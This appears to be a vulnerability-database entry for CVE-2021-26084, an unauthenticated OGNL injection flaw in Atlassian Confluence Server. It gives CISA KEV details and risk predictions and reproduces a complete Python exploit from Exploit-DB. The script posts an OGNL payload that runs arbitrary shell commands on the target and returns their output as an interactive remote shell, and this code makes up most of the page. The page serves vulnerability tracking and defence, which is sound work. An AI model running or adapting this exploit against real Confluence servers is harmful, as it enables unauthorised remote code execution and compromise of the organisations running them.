CVE-2021-26084

unknown KEV

Published 2021-11-03 · Modified 2021-11-03

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

2.5

Description

Atlassian Confluence Server and Data Server contain an Object-Graph Navigation Language (OGNL) injection vulnerability that may allow an unauthenticated attacker to execute code.

CISA KEV

Vendor: Atlassian
Product: Confluence Server and Data Center
Due date: 2021-11-17

Predictions

Exploit likelihood

99%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-50243 webapps java python · 3 KB

Fellipe Oliveira · 2021-09-01

Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)

python exploit Source: Exploit-DB

# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)
# Date: 01/09/2021
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.12.x versions before 7.12.5
# Tested on: Linux Distros 
# CVE : CVE-2021-26084

#!/usr/bin/python3

# References: 
# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

import requests
from bs4 import BeautifulSoup
import optparse

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x")

options, args = parser.parse_args()
session = requests.Session()

url_vuln = options.url
endpoint = options.path

if not options.url or not options.path:

    print('[+] Specify an url target')
    print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
    print('[+] Example help usage: exploit.py -h')
    exit()


def banner():

    print('---------------------------------------------------------------')
    print('[-] Confluence Server Webwork OGNL injection')
    print('[-] CVE-2021-26084')
    print('[-] https://github.com/h3v0x')
    print('--------------------------------------------------------------- \n')


def cmdExec():

    while True:
        cmd = input('> ')
        xpl_url = url_vuln + endpoint
        xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate"}
        xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
        rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)

        soup = BeautifulSoup(rawHTML.text, 'html.parser')
        queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
        print(queryStringValue)


banner()
cmdExec()

Metasploit modules

exploit_multi/http/atlassian_confluence_webwork_ognl_injection rank 600

Atlassian Confluence WebWork OGNL Injection

Source fetch failed: fetch_error — view the original via the link above.

References

https://nvd.nist.gov/vuln/detail/CVE-2021-26084

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.